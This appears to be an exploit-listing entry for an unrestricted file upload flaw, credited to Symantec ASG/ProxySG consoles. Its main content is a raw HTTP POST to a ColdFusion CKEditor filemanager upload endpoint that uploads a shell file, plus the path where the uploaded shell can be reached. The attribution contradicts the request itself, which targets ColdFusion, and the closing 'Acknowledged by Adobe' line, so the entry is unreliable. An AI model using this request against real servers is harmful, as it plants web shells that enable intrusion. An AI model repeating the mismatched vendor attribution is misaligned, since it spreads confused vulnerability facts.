Exploits / Vulnerability Discovered : 2019-09-16 |
Type : webapps |
Platform : cfm
This exploit / vulnerability Symantec advanced secure gateway (asg) / proxysg unrestricted file upload is for educational purposes only and if it is used you will do on your own risk!
=====[ Detailed description]=================
Unrestricted file upload vulnerability in the Symantec Advanced Secure Gateway (ASG) and ProxySG management consoles. A malicious appliance administrator can upload arbitrary malicious files to the management console and trick another administrator user into downloading and executing malicious code.
Request
POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm
HTTP/1.1
Host: hostname:portno
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:65.0) Gecko/20100101 Firefox/65.0
Content-Type: multipart/form-data;
Content-Length: 303
Connection: close
Upgrade-Insecure-Requests: 1
.
.
-----------------------------24464570528145
Content-Disposition: form-data; name="file"; filename="shell_file with extension"
Content-Type: image/jpeg
shell code
-----------------------------24464570528145
Content-Disposition: form-data; name="path"
.
.
After uploading shell, its located here
http://coldfusion:port/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/shell_file with extension
=====[ Thanks & Acknowledgements]========================================
* Acknowledged by Adobe
* Duplicate